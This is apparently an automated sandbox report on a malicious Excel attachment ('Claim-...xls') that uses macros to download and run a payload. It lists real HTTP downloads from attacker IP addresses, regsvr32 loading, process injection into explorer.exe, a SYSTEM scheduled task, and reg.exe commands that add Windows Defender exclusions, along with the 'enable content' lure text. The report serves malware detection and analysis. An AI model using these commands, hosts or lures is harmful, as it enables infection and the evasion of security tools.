
Windows Analysis Report Claim-1763045001-09242021.xls

Overview

General Information

Sample Name: Claim-1763045001-09242021.xls
Analysis ID: 489852
MD5: 7a4ee63e2e2aacea7ffa5d4f27261347
SHA1: c47ebf9357eaa3984e2a977a77469f2097004bda
SHA256: 3776549225fea6c85372989034fb8d4d0d94eeca4ba33e8473d50898afea6533
Tags: xls

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2664 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2060 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2136 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 984 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 1476 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2796 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1448 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 1892 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3060 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 548 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • taskeng.exe (PID: 2424 cmdline: taskeng.exe {7B099BF3-11FE-497B-BFDA-BF23CFB73488} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • regsvr32.exe (PID: 2344 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2276 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • reg.exe (PID: 908 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • reg.exe (PID: 2652 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
    • regsvr32.exe (PID: 1960 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1468 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Claim-1763045001-09242021.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2664, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 2060
    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started | Author: Florian Roth | Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2060, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 2136

    Persistence and Installation Behavior:

    Sigma detected: Schedule system process
    Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 984, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48, ProcessId: 1476

    Jbx Signature Overview

    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000049.00000003.1179566339.0000000002731000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000037.00000002.1179167392.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000049.00000003.1180826805.0000000002731000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 86_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 44463.6863100694[1].dat.0.dr
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Fri, 24 Sep 2021 14:28:11 GMT; Content-Type: application/octet-stream; Content-Length: 495616; Connection: keep-alive; X-Powered-By: PHP/5.4.16; Accept-Ranges: bytes; Expires: 0; Cache-Control: no-cache, no-store, must-revalidate; Content-Disposition: attachment; filename="44463.6863100694.dat"
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Fri, 24 Sep 2021 14:28:21 GMT; Content-Type: application/octet-stream; Content-Length: 495616; Connection: keep-alive; X-Powered-By: PHP/5.4.16; Accept-Ranges: bytes; Expires: 0; Cache-Control: no-cache, no-store, must-revalidate; Content-Disposition: attachment; filename="44463.6863100694.dat"
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Fri, 24 Sep 2021 14:33:44 GMT; Content-Type: application/octet-stream; Content-Length: 495616; Connection: keep-alive; X-Powered-By: PHP/5.4.16; Accept-Ranges: bytes; Expires: 0; Cache-Control: no-cache, no-store, must-revalidate; Content-Disposition: attachment; filename="44463.6863100694.dat"
    Source: global traffic | HTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 190.14.37.173; Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 111.90.148.104; Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 51.89.115.111; Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp, explorer.exe, 00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp, taskeng.exe, 00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000036.00000002.1180236690.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000037.00000002.1177193034.0000000000A10000.00000002.00020000.sdmp, regsvr32.exe, 0000004C.00000002.1185707196.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1181817022.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000052.00000002.1248992914.0000000000980000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp, explorer.exe, 00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp, taskeng.exe, 00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].dat
    Source: global traffic | HTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 190.14.37.173; Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 111.90.148.104; Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 51.89.115.111; Connection: Keep-Alive

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4 | Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0 | Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1 | Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 86_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 86_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 86_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 86_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_00094FC0
    Source: Claim-1763045001-09242021.xls | OLE, VBA macro line: Sub auto_open()
    Source: Claim-1763045001-09242021.xls | OLE, VBA macro line: Sub auto_close()
    Source: Claim-1763045001-09242021.xls | OLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-1763045001-09242021.xls | OLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-1763045001-09242021.xls | OLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
    Source: 44463.6863100694[2].dat.0.dr | Static PE information: No import functions for PE file found
    Source: Fiosa1.der.0.dr | Static PE information: No import functions for PE file found
    Source: Fiosa.der.73.dr | Static PE information: No import functions for PE file found
    Source: Fiosa2.der.86.dr | Static PE information: No import functions for PE file found
    Source: Fiosa.der.87.dr | Static PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: Claim-1763045001-09242021.xls | OLE indicator, VBA macros: true
    Source: Joe Sandbox View | Dropped File: C:\Users\user\Fiosa.der 4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
    Source: Joe Sandbox View | Dropped File: C:\Users\user\Fiosa2.der 4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
    Source: 44463.6863100694[2].dat.0.dr | Static PE information: Data appended to the last section found
    Source: Fiosa1.der.0.dr | Static PE information: Data appended to the last section found
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44463.6863100694[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: .................................&Z.....(.P.............................\w......................................................................
    Source: C:\Windows\System32\reg.exeConsole Write: ................T...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................(...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........).....N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {7B099BF3-11FE-497B-BFDA-BF23CFB73488} S-1-5-18:NT AUTHORITY\System:Service:
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCFDB.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@34/9@0/3
